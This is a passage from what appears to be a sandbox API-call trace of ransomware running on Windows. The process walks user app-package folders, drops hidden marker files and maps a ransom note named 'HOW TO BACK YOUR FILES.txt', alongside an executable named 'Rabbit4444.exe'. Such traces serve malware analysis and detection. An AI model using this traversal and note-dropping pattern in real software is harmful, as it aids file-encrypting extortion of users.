returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\" [0062.607] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0062.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.609] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.611] FlushFileBuffers (hFile=0x298) returned 1 [0062.612] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.612] CloseHandle (hObject=0x298) returned 1 [0062.613] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState") returned 81 [0062.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.613] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086a4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0062.613] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.613] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.613] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.613] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086a4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.613] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.613] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.613] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.613] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea37924, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea37924, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.613] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.613] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.613] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea37924, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea37924, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.613] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0062.614] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.614] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.614] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0062.614] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.615] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.615] CloseHandle (hObject=0x260) returned 1 [0062.615] CloseHandle (hObject=0x298) returned 1 [0062.615] GetCurrentThreadId () returned 0xd98 [0062.615] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0062.615] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache" [0062.615] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118398 | out: hHeap=0xe0000) returned 1 [0062.615] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0062.615] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache" [0062.615] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\" [0062.615] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0062.615] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.616] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.618] FlushFileBuffers (hFile=0x298) returned 1 [0062.619] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.620] CloseHandle (hObject=0x298) returned 1 [0062.620] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache") returned 81 [0062.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.620] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086018, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.620] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.620] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.620] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.620] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2086018, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.621] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.621] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.621] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.621] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.621] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.621] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea59734, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea59734, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.621] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.621] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.621] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea59734, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea59734, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.621] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.621] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.621] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.622] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.622] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.622] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.622] CloseHandle (hObject=0x27c) returned 1 [0062.622] CloseHandle (hObject=0x298) returned 1 [0062.622] GetCurrentThreadId () returned 0xd98 [0062.622] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0062.622] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData" [0062.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121860 | out: hHeap=0xe0000) returned 1 [0062.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0062.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData" [0062.623] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\" [0062.623] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0062.623] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.624] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.626] FlushFileBuffers (hFile=0x298) returned 1 [0062.631] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.631] CloseHandle (hObject=0x298) returned 1 [0062.631] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData") returned 78 [0062.631] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15aca2b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd20858aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0062.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.631] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.631] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.631] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.631] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15aca2b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd20858aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.632] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.632] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.632] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.632] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.632] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.632] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea59734, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea59734, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.632] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.632] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.632] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea59734, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea59734, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea59734, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.632] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0062.632] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.632] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.633] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.636] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.637] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.637] CloseHandle (hObject=0x27c) returned 1 [0062.637] CloseHandle (hObject=0x298) returned 1 [0062.637] GetCurrentThreadId () returned 0xd98 [0062.637] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0062.637] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe" [0062.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113238 | out: hHeap=0xe0000) returned 1 [0062.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0062.637] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe" [0062.637] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\" [0062.637] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0062.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.640] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.644] FlushFileBuffers (hFile=0x298) returned 1 [0062.645] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.645] CloseHandle (hObject=0x298) returned 1 [0062.646] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe") returned 75 [0062.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.646] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef8b4999, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeea7f909, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0062.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.646] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.646] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.646] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.646] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: 